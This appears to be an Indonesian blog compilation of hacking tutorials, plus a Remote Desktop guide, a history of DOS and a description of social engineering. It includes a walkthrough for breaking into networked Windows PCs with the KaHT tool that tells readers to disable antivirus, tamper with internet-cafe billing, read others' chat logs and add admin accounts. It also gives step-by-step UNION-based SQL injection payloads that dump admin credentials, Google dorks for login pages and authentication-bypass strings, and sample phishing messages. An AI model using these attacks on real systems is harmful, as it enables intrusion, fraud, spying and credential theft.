Macam2 tools untuk:

a. Mengintip Data yang Mengalir Melalui Jaringan

Seiring perkembangan jaman dan teknologi, para hacker sering melakukan aktifitas yang kreatif dengan ide-ide cemerlang.
Berikut adalah video cara hacker nge-hack lewat jaringan, mengintip aktifitas seseorang melalui jaringan…!!! Hati-hati bisa jadi suatu saat Anda yang di intip :p

Itulah tadi sedikit tontonan video Mengintip Aktifitas Orang Melalui Jaringan. Semoga video tersebut bisa lebih meningkatkan kewaspadaan kita saat browsing internet pada suatu jaringan tertentu. Sekian dan terima kasih, semoga bermanfaat bagi kita semua.

sumber :  http://blog.cyber4rt.com/2012/06/mengintip-aktifitas-orang-melalui.html

b. Remote Komputer Lain

Ada kalanya teman atau keluarga kita butuh bantuan kita untuk memperbaiki komputer/laptopnya yang sedang error, tapi teman kita tersebut berada di suatu tempat yang cukup jauh untuk kita temui. Jika komputer teman kita tersebut masih terhubung dengan jaringan lokal (LAN) ataupun Internet maka kita masih dapat membantunya tanpa harus menemuinya. Kita bisa melakukan kendali di komputernya dari komputer kita dengan fasilitas Remote Desktop.
Kita bisa mengendalikan/mengontrol sebuah komputer dari komputer dari komputer yang lain dalam lingkungan jaringan komputer lokal / Local Area Networ (LAN) maupun lewat jaringan Internet.
Syarat utama untuk bisa mengendalikan komputer lain adalah masing-masing harus komputer terinstal software client dan server. Software untuk mengendalikan komputer dari jarak jauh ini disebut dengan aplikasi Remote Desktop.
Pada sistem operasi Microsoft mulai dari Microsoft Windows XP, aplikasi Remote Desktop sudah otomatis terinstal pada saat kita menginstal Windows XP tersebut. Namun untuk bisa menjalankannya kita harus melakukan setting terlebih dahulu.
Untuk menjalankan Remote Desktop, minimal kita butuhkan 2 komputer (PC) yang terinstal aplikasi Remote Desktop. Cara melakukan settingnya adalah sebagai berikut.
Untuk memudahkan kita memahami cara setting dan koneksi Remote Desktop, maka saya akan memberina masing2 komputer adalah sebagai berikut:
Komputer kamu => CLIENT
Komputer teman => SERVER
Cara Setting di Komputer SERVER
Klik kanan My Computer dan pilih Properties. klik tab Remote kemudian beri tanda silang/checklist pada tulisan Allow users to connect remotely to this computer. Kemudian klik OK.
Buka setting Windows Firewall, caranya klik Start > Control Panel > Windows Firewall, kemudian klik tab Exceptipns dan beri tanda checklist pada tulisan Remote Desktop.
Dan yang terakhir pastikan komputer ini memiliki Password Administrator, jika belum ada cara membuatnya adalah klik Start > Control Panel > User Accounts, kemudian klik nama Useryang memiliki status sebagai Computer Administrator. Klik tulisan Create a password, kemudian masukkan password yang kamu inginkan dan masukkan lagi password yang sama di bawahnya dan klik Create Password. Jika ada pertanyaan Do you want to make your files and folders private? klik tombol Yes, Make Private.
Catat IP address komputer ini, caranya klik lambang Internet Connection/Local Area Connection di pojok kanan bawah kemudian klik tab Support dan catat IP Address komputer ini.
Catat User Name komputer ini caranya klik Start maka user name akan terlihat pada sisi paling atas Start Menu ini jika Start Menu yang kamu gunakan adalah bukan Classic Start Menu.
Setting di komputer SERVER telah selesai, sekarang kamu sudah bisa melakukan koneksi Remote Desktop dari komputer kamu (CLIENT.
Cara Melakukan koneksi Remote Desktop dari komputer CLIENT
Jalankan aplikasi Remote Desktop Connection, caranya klik Start > All Programs > Accessories > Communications > Remote Desktop Connection
.
Klik tombol Options >>, masukkan hHstname/alamat IP komputer tujuan, User name dan password komputer tujuan. Misalnya seperti pada gambar di bawah ini, kemudian klik tombol Connect.
Jika berhasil, di layar kamu akan tampil desktop yang sama dengan komputer tujuan kamu. Sekarang dari sini kamu sudah bisa melakukan kontrol apa saja dengan menggunakan mouse dan keyboard kamu.
Selain aplikasi Remote Desktop, ada aplikasi lain yang bisa menjadi alternatif pilihan dengan fitur yang lebih dari sekedar Remote Desktop dan dengan kecepatan yang lebih baik, misalnya Remote Administrator (Radmin) dan Virtual Network Connection (VNC).
Catatan:
Jika komputer tujuan menggunakan koneksi Speedy, maka kamu harus melakukan setting Port Forwarding pada modem ADSL yang digunakan oleh komputer SERVER. Cara setting Port Forwarding tergantung dari merk modem ADSL masing-masing, untuk petunjuknya kamu bisa melihat di http://www.portforward.com sebagai bahan referensi. Cari petunjuk yang sesuai dengan merk dan tipe modem ADSL kamu.
Pada saat terjadi koneksi Remote Desktop, di komputer server tidak bisa melakukan aktifitas karena komputer server akan berada pada posisi Log off. Ini akan berbeda jika kamu menggunakan software lain seperti Radmin dan VNC.

thanks : http://feiaja.blogspot.com

c. Menguasai Komputer Lain

CARA MASUK KOMPUTER ORANG LAIN DENGAN CMD/MSDOS

    Kali ini saya akan memberikan sedikit informasi mengenai bagaimana cara seseorang yang ingin mencoba menerobos masuk ke komputer orang lain melalui DOS(Windows XP/2000).Hal yang pertama kita lakukan adalah kita harus tahu dulu alamat IP address/Host Name/Computer name target/korban:
berikut langkah-langkah nya:
1. Melacak alamat IP suatu situs Untuk mengetahui alamat IP suatu situs, kita dapat melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan PING WWW.SITUS-YANG-DILACAK.COM lalu tekan enter. Maka akan muncul alamat Ip situs tersebut.
2. Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda bukawww.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota.
3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: :: Kirimkan suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) danketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.
Setelah semua nya selesai anda hanya tinggal menambahkan sedikit ramuan mujara/tools tambahan
Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu

internet Maniac (Internet Maniac.exe) … Download Interenet
Maniac
Berfungsi untuk mengetahui ip addreas client melalui computer name /
hostname
KaHT (KaHt.exe) … Download program hacker

KaHT

Berfungsi sebagai program untuk menerobos ke computer server atau client
Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai
warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe
Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname
dengan 2 cara.
Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai
warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe
Setelah 2 program diatas di download maka ekstractlah dahulu program
tersebut, entah pake WINZIP atau pake apa.
Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda
dengan melihat para hostname dengan 2 cara.
Untuk Windows XP
Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu
pilih A computer on the Network lalu langsung klik search maka akan segera
muncul computer-komputer yang terkoneksi dalam jaringan.
Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini)Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada
menu Search for other item pilihlah computers, lalu akan muncul Search for
computer, maka langsung klik Search Now maka nama-nama computer akan muncul
(Alternatif cara yang cepat dapat mengklik My Network Place / Network
Neighboure saja)
Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka
loe langsung aja jalankan program Internet Maniac
Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik
resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor
ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki.
Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan
berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh
antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau
terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja
dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting,
tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat.
Cara masuk DOS Mode
Untuk Windows XP :
Masuklah ke Start, All programs, Accessories lalu Command Prompt
Untuk Windows 95/98/Me/NT/2000
Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt
Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh
bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di
C:\KaH) maka ketikkan “CD\KaHT” dan seterusnya.
Jika sudah, ini saatnya?
Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran.
kalau bingung bisa begini : “KaHT Ip1 ip2″
ip1 : ip awal yang discan
ip2 : ip terahkir yang discan Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac
tadi itu lho.
Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1″ lalu enter aja
Nah disini nanti program akan bekerja otomatis.
Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka
anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda
akan berada di “c:\windows\system” milik komputer tujuan / sasaran setelah
pen-scan-an selesai.
Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe
Nah kalo udah begini kita bisa berkreasi :
Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server,
ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus
nanti ketahuan ama operator warnetnya, hehe.
Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus /
kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut,
biasanya seh di C:\Program Files\MiRC, buka file MiRC.INI, lalu Log IRC di
On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat
“/logs” maksudnya kalau tadi di C:\program Files\MiRC program MiRCnya maka
cukup masuk aja di C:\Program Files\MiRC\Logs nanti disitu ada file-file log
hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe,
kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya
atau periksa di MiRC.INI, gampangkan.
Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa
lho, delete aja file-file systemnya, hehe.
Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih
bermanfaat dari pada diatas
Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan
Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan
usil dari pihak-pihak yang tidak bertanggung jawab..
5.Membuat akses administrator Windows untuk kita lewat komputer lain
Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui
LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht
yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik.
Melihat akses guest dan administrator di Windows
Ketik : net user
Melihat aktif tidaknya guest di Windows
Ketik : net user guest
Membuat akses guest menjadi Administrator dengan perintah :
Ketik : net localgroup Administrators Guest /add
Membuat akses adminstrator sendiri :
1. Ketik : net user /add
2. Ketik : net localgroup Administrators /add
Menghapus akses administrator
Ketik : net localgroup Users /delete
Dipublikasi di Uncategorized | Meninggalkan komentar

Penjelasan Secara Detail Tentang :

a. SQL Injection

Manual Tutorial SQL Injection

Pengertian SQL Injection, SQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ‘ atau –
comments: /* atau –
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x

[ Langkah 1 ]

  • Carilah target
    Misal: [site]/berita.php?id=100Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
    contoh:
    [site]/berita.php?id=100′ atau
    [site]/berita.php?id=-100
    Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]

[ Langkah 2 ]

  • Mencari dan menghitung jumlah table yang ada dalam databasenya…
    gunakan perintah: order byContoh:[site]/berita.php?id=-100+order+by+1– atau
    [site]/berita.php?id=-100+order+by+1/*Ceklah secara Langkah by Langkah (satupersatu)…
    Misal:[site]/berita.php?id=-100+order+by+1–
    [site]/berita.php?id=-100+order+by+2–
    [site]/berita.php?id=-100+order+by+3–
    [site]/berita.php?id=-100+order+by+4–Sehingga muncul error atau hilang pesan error…
    Misal: [site]/berita.php?id=-100+order+by+9– 

    Berarti yang kita ambil adalah sampai angka 8
    Menjadi [site]/berita.php?id=-100+order+by+8–

[ Langkah 3 ]

  • untuk mengeluarkan angka berapa yang muncul gunakan perintah union
    karena tadi error sampai angka 9
    maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–ok seumpama yg keluar angka 5gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
    misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
    [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–Lihat versi yang digunakan se’umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..

[ Langkah 4 ]

  • Untuk menampilkan table yang ada pada web tersebut adalah
    perintah table_name >>> dimasukan pada angka yangg keluar tadi
    perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhirCode:[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–Se’umpama table yang muncul adalah “admin”

[ Langkah 5 ]

  • untuk menampilkan semua isi dari table tersebut adalah
    perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. tables+where+table_schema=database()–

[ Langkah 6 ]

  • Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.columns+where+table_name=0xhexa– >>> dimasukan setelah angka terakhir[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0xhexa–Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
    Website yg digunakan untuk konversi :http://www.v3n0m.net/ascii.htmContoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0x61646D696E–

[ Langkah 7 ]

  • Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan caraperintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
    perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhirContoh :[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–Contoh kata yang keluar adalah id,username,passwordContoh : 

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–

[ Langkah 8 ]

  • Tahap terakhir mencari halaman admin atau login.

Source HN Forum

SQL Injection adalah salah satu teknik yang sering di gunakan untuk menyerang sebuah situs web. dengan cara ini memungkinkan seseorang dapat login tanpa harus memiliki akun di sebuah web site Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database bahkan pula dapat mematikannya.

Contoh Sintaks SQL Injection
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL

Contoh sintaks SQL Injection
1) Sintaks SQL string ‘– setelah nama username

Penanganan SQL Injection 
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php
Contoh script php semula :
$query = “select id,name,email,password,type,block from user ” . 
“where email = ‘$Email’ and password = ‘$Password’”; 
$hasil = mySQL_query($query, $id_mySQL); 
while($row = mySQL_fetch_row($hasil))

$Id = $row[0]; 
$name = $row[1]; 
$email = $row[2]; 
$password = $row[3]; 
$type = $row[4]; 
$block = $row[5]; 

if(strcmp($block, ‘yes’) == 0)
{
echo “<script>alert(‘Your account has been blocked’);
document.location.href=’index.php’;</script>\n”; 
exit(); 

else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :

Maka dilakukan perubahan script menjadi :
$query = “select id,name,email,password,type,block from user”. 
“where email = ‘$Email’”; 
$hasil = mySQL_query($query, $id_mySQL); 
while($row = mySQL_fetch_row($hasil))

$Id = $row[0]; 
$name = $row[1]; 
$email = $row[2]; 
$password = $row[3]; 
$type = $row[4]; 
$block = $row[5]; 

if(strcmp($block, ‘yes’) == 0)

echo “<script>alert(‘Your account has been blocked’); 
document.location.href=’index.php’;</script>\n”; 
exit(); 

$pass = md5($Password); 
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));


2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :

3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :

Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
“abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”

validatepassword = true
for i = 1 to len( input )

c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
“/admin.asp”
“/login.asp”
“/logon.asp”
“/adminlogin.asp”
“/adminlogon.asp”
“/admin_login.asp”
“/admin_logon.asp”
“/admin/admin.asp”
“/admin/login.asp”
“/admin/logon.asp”
{anda bisa menambahi sendiri sesuai keinginan anda}

3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : or a’=’a
Password : or a’=’a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : or a’=’a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 — ; “ or 0=0 — ; or 0=0 — ; ‘ or 0=0 # ; 
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah “Startup and run SQL Server” menggunakan low privilege user di SQL Server Security tab.

Semoga berbagai artikel tersebut bermanfaat, thanks to google and blogspot. :)

– See more at: http://www.binushacker.net/pengertian-tutorial-tools-sql-injection-cara-kumpulan-software-sql-injection.html#sthash.zCqFCuDb.dpuf

b. DOS

DOS adalah (merupakan) sistem operasi yang menggunakan interface command-line yang digunakan para pengguna komputer pada dekade tahun 1980-an. Untuk fasilitas booting komputer dan menjalankan beberapa aplikasi software, misalnya WS dan Lotus. Masih banyak fungsi DOS yang digunakan pada zaman sekarang, terutama dalam menyelesaikan beberapa troubleshooting pada hardware komputer. Walaupun bisa juga dilakukan pada sistem operasi berbasis GUI. Berikut ini fungsi-fungsi DOS.
• Mengorganisasikan atau mengendalikan kegiatan komputer
• Mengatur memori
• Mengatur proses input dan output data
• Management file
• Management directory

Keluarga DOS terbagi menjadi bebrapa kelas, yakni :

  • MS-DOS (Microsoft Disk Operating System), termasuk di antaranya adalah Tandy DOS, Compaq DOS, Q-DOS (Quick and Dirty Operating System) dan beberapa klon dari sistem operasiMS-DOS yang dijual kepada para pembuat sistem komputer IBM PC/Compatible.
  • IBM PC-DOS (International Business Machine Personal Computer Disk Operating System), yang meskipun masih buatan Microsoft, diubah sedikit-sedikit untuk dapat digunakan oleh komputer IBM PC.
  • DR-DOS (Digital Research Disk Operating System), yang dibuat oleh pembuat sistem operasi CP/M, Gary Kildall.

Novell Personal Netware, merupakan versi DR-DOS yang dijual kepada Novell karena perusahaan yang menaungi CP/M mengalami kebangkrutan (Novell mengakuisisi Digital Research Incorporated).
Caldera DOS, merupakan versi Novell Personal Netware yang dijual kepada Caldera Corporation.
FreeDOS, merupakan versi DOS yang dibangun dari sisa-sisa pengembangan Caldera DOS, yang dikembangkan oleh komunitas open source.

  • MS-DOS (Microsoft Disk Operating System) adalah sebuah sistem operasi yang sangat banyak digunakan oleh computer IBM-PC atau yang kompatibel dengannya. Microsoft membuat MS-DOS sebagai sebuah sistem operasi mainstream, sebelum pada akhirnya menghentikan dukungan MS-DOS secara perlahan ketika mereka membuat sebuah sistem operasi berbasis antarmuka grafis (dikenal juga dengan sebutan GUI) untuk pasar mainstream, yang di sebut sebagai Microsoft Windows.
  • MS-DOS dirilis pertama kali pada tahun 1981, dan seiring dengan waktu, Microsoft pun meluncurkan versi yang lebih baru dari MS-DOS. Tidak kurang hingga delapan kali Microsoft meluncurkan versi-versi baru MS-DOS dari tahun 1981 hingga Microsoft menghentikan dukungan MS-DOS pada tahun 2000. MS-DOSmerupakan salah satu kunci keberhasilan Microsoft dalam memproduksi perangkat lunak, dari sebuah perusahaan kecil pembuat bahasa pemrograman saat didirikan hingga menjadi sebuah perusahaan perangkat lunak yangs seolah menguasi dunia.
  • MS-DOS sebenarnya dibuat oleh sebuah perusahaan pembuat computer, yang bernama Seattle Computer Products (SCP) yang di kepalai oleh Tim Patterson—yang belakangan di rekrut oleh Microsoft untuk mengembangkan DOS—pada tahun 1980 sebagai sebuah perangkat lunak sistem operasi dengan nama Q-DOS (singkatan dari Quick and Dirty Operating System), yang selanjutnya diubah namanya menjadi 86-DOS, karena Q-DOS didesain agar dapat berjalan pada komputer dengan prosesor Intel 8086. Microsoft pun membeli lisensinya dengan harga 50.000 dolar Amerika dari SCP, lalu mengubah namanya menjadi MS-DOS. Selanjutnya, saat IBM hendak meluncurkan komputer pribadi yang disebut dengan IBM PC, Microsoft pun menjual lisensi MS-DOS kepada IBM.

c. Social Enginering

Menurut definisi, “social engineering” adalah suatu teknik ‘pencurian’ atau pengambilan data
atau informasi penting/krusial/rahasia dari seseorang dengan cara menggunakan pendekatan
manusiawi melalui mekanisme interaksi sosial. Atau dengan kata lain social engineering
adalah suatu teknik memperoleh data/informasi rahasia dengan cara mengeksploitasi
kelemahan manusia. Contohnya kelemahan manusia yang dimaksud misalnya:
 Rasa Takut – jika seorang pegawai atau karyawan dimintai data atau informasi dari
atasannya, polisi, atau penegak hukum yang lain, biasanya yang bersangkutan akan
langsung memberikan tanpa merasa sungkan;
 Rasa Percaya – jika seorang individu dimintai data atau informasi dari teman baik,
rekan sejawat, sanak saudara, atau sekretaris, biasanya yang bersangkutan akan
langsung memberikannya tanpa harus merasa curiga; dan
 Rasa Ingin Menolong – jika seseorang dimintai data atau informasi dari orang yang
sedang tertimpa musibah, dalam kesedihan yang mendalam, menjadi korban bencana,
atau berada dalam duka, biasanya yang bersangkutan akan langsung memberikan data
atau informasi yang diinginkan tanpa bertanya lebih dahulu.
Tipe Social Engineering
Pada dasarnya teknik social engineering dapat dibagi menjadi dua jenis, yaitu: berbasis
interaksi sosial dan berbasis interaksi komputer. Berikut adalah sejumlah teknik social
engineering yang biasa dipergunakan oleh kriminal, musuh, penjahat, penipu, atau mereka
yang memiliki intensi tidak baik. Dalam skenario ini yang menjadi sasaran penipuan adalah
individu yang bekerja di divisi teknologi informasi perusahaan. Modus operandinya sama,
yaitu melalui medium telepon.

Sementara itu untuk jenis kedua, yaitu menggunakan komputer atau piranti elektronik/digital
lain sebagai alat bantu, cukup banyak modus operandi yang sering dipergunakan seperti:
Skenario 1 (Teknik Phishing – melalui Email)
Strategi ini adalah yang paling banyak dilakukan di negara berkembang seperti Indonesia.
Biasanya si penjahat menyamar sebagai pegawai atau karyawan sah yang merepresentasikan
bank. Email yang dimaksud berbunyi misalnya sebagai berikut:
“Pelanggan Yth. Sehubungan sedang dilakukannya upgrade sistem teknologi
informasi di bank ini, maka agar anda tetap mendapatkan pelayanan perbankan yang prima,
mohon disampaikan kepada kami nomor rekening, username, dan password anda untuk kami
perbaharui. Agar aman, lakukanlah dengan cara me-reply electronic mail ini. Terima kasih
atas perhatian dan koordinasi anda sebagai pelanggan setia kami.
Wassalam,
Manajer Teknologi Informasi”
Bagaimana caranya si penjahat tahu alamat email yang bersangkutan? Banyak cara yang
dapat diambil, seperti: melakukan searching di internet, mendapatkan keterangan dari kartu
nama, melihatnya dari anggota mailing list, dan lain sebagainya.
Skenario 2 (Teknik Phishing – melalui SMS)
Pengguna telepon genggam di Indonesia naik secara pesat. Sudah lebih dari 100 juta nomor
terjual pada akhir tahun 2008. Pelaku kriminal kerap memanfaatkan fitur-fitur yang ada pada
telepon genggam atau sejenisnya untuk melakukan social engineering seperti yang terlihat
pada contoh SMS berikut ini:
“Selamat. Anda baru saja memenangkan hadiah sebesar Rp 25,000,000 dari Bank X
yang bekerjasama dengan provider telekomunikasi Y. Agar kami dapat segera mentransfer
uang tunai kemenangan ke rekening bank anda, mohon diinformasikan user name dan
passoword internet bank anda kepada kami. Sekali lagi kami atas nama Manajemen Bank X
mengucapkan selamat atas kemenangan anda…”
Skenario 3 (Teknik Phishing – melalui Pop Up Windows)
Ketika seseorang sedang berselancar di internet, tiba-tiba muncul sebuah “pop up window”
yang bertuliskan sebagai berikut:
“Komputer anda telah terjangkiti virus yang sangat berbahaya. Untuk
membersihkannya, tekanlah tombol BERSIHKAN di bawah ini.”
Tentu saja para awam tanpa pikir panjang langsung menekan tombol BERSIHKAN yang
akibatnya justru sebaliknya, dimana penjahat berhasil mengambil alih komputer terkait yang
dapat dimasukkan virus atau program mata-mata lainnya.
Jenis Social Engineering Lainnya
Karena sifatnya yang sangat “manusiawi” dan memanfaatkan interaksi sosial, teknik-teknik
memperoleh informasi rahasia berkembang secara sangat variatif. Beberapa contoh adalah
sebagai berikut:
 Ketika seseorang memasukkan password di ATM atau di PC, yang bersangkutan
“mengintip” dari belakang bahu sang korban, sehingga karakter passwordnya dapat
terlihat;
 Mengaduk-ngaduk tong sampah tempat pembuangan kertas atau dokumen kerja
perusahaan untuk mendapatkan sejumlah informasi penting atau rahasia lainnya;
 Menyamar menjadi “office boy” untuk dapat masuk bekerja ke dalam kantor
manajemen atau pimpinan puncak perusahaan guna mencari informasi rahasia;
 Ikut masuk ke dalam ruangan melalui pintu keamanan dengan cara “menguntit”
individu atau mereka yang memiliki akses legal;
 Mengatakan secara meyakinkan bahwa yang bersangkutan terlupa membawa ID-Card
yang berfungsi sebagai kunci akses sehingga diberikan bantuan oleh satpam;
 Membantu membawakan dokumen atau tas atau notebook dari pimpinan dan
manajemen dimana pada saat lalai yang bersangkutan dapat memperoleh sejumlah
informasi berharga;
 Melalui chatting di dunia maya, si penjahat mengajak ngobrol calon korban sambil
pelan-pelan berusaha menguak sejumlah informasi berharga darinya;
 Dengan menggunakan situs social networking – seperti facebook, myspace, friendster,
dsb. – melakukan diskursus dan komunikasi yang pelan-pelan mengarah pada proses
“penelanjangan” informasi rahasia;
 dan lain sebagainya.
Target Korban Social Engineering
Statistik memperlihatkan, bahwa ada 4 (empat) kelompok individu di perusahaan yang kerap
menjadi korban tindakan social engineering, yaitu:
1. Receptionist dan/atau Help Desk sebuah perusahaan, karena merupakan pintu masuk
ke dalam organisasi yang relatif memiliki data/informasi lengkap mengenai personel
yang bekerja dalam lingkungan dimaksud;
2. Pendukung teknis dari divisi teknologi informasi – khususnya yang melayani
pimpinan dan manajemen perusahaan, karena mereka biasanya memegang kunci
akses penting ke data dan informasi rahasia, berharga, dan strategis;
3. Administrator sistem dan pengguna komputer, karena mereka memiliki otoritas untuk
mengelola manajemen password dan account semua pengguna teknologi informasi di
perusahaan;
4. Mitra kerja atau vendor perusahaan yang menjadi target, karena mereka adalah pihak
yang menyediakan berbagai teknologi beserta fitur dan kapabilitasnya yang
dipergunakan oleh segenap manajemen dan karyawan perusahaan; dan
5. Karyawan baru yang masih belum begitu paham mengenai prosedur standar
keamanan informasi di perusahaan.
